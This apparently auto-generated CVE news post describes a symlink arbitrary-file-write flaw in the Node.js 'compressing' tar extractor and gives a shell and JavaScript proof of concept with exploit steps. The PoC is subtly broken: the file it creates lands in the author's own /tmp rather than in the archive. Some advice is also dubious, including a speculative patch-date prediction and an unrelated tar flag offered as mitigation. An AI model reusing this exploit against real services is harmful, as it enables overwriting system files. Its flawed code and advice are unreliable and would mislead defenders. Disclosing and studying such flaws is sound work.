Nodejs compressing, Arbitrary File Write via Symlink Extraction, CVE-2024-27919 (Critical)

Listen to this Post

The vulnerability in `compressing.tar.uncompress` arises from improper validation of symbolic link targets within TAR archives. When extracting an archive, the library restores symlinks inside the specified output directory without checking if the link’s target resolves to a location outside this directory. The path sanitization only applies to the symlink entry’s own path, not its target. During the sequential extraction process, if a file entry’s path is prefixed by an already-extracted malicious symlink, the file system resolves the full path through the symlink. This causes the file’s content to be written to the symlink’s target location, which can be an arbitrary path on the host filesystem, such as `/etc/passwd` or a web root. This arbitrary file write is achieved by the extractor following the symlink when creating the subsequent file, bypassing the intended containment of the extraction root.
Platform: Node.js npm
Version: <=1.10.3, =2.0.0
Vulnerability: Arbitrary File Write
Severity: Critical
date: 2024-03-28

Prediction: Patch by 2024-04-11

What Undercode Say:

mkdir -p archive
echo "base content" > archive/baseFile.txt
ln -s /tmp archive/myTmp
echo "Arbitrary File Write" > archive/myTmp/poc.txt
tar -cvf malicious.tar -C archive .
Using the vulnerable library
const compressing = require('compressing');
await compressing.tar.uncompress('malicious.tar', './output');
// File is written to /tmp/poc.txt

How Exploit:

Craft TAR with symlink.

Upload archive to service.

Trigger extraction function.

File written to symlink target path.

Protection from this CVE:

Upgrade to patched version.

Sandbox extraction processes.

Use `–no-preserve-owner` flag.

Validate paths post-extraction.

Impact:

Remote Code Execution

Privilege Escalation

System File Overwrite

Data Corruption

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top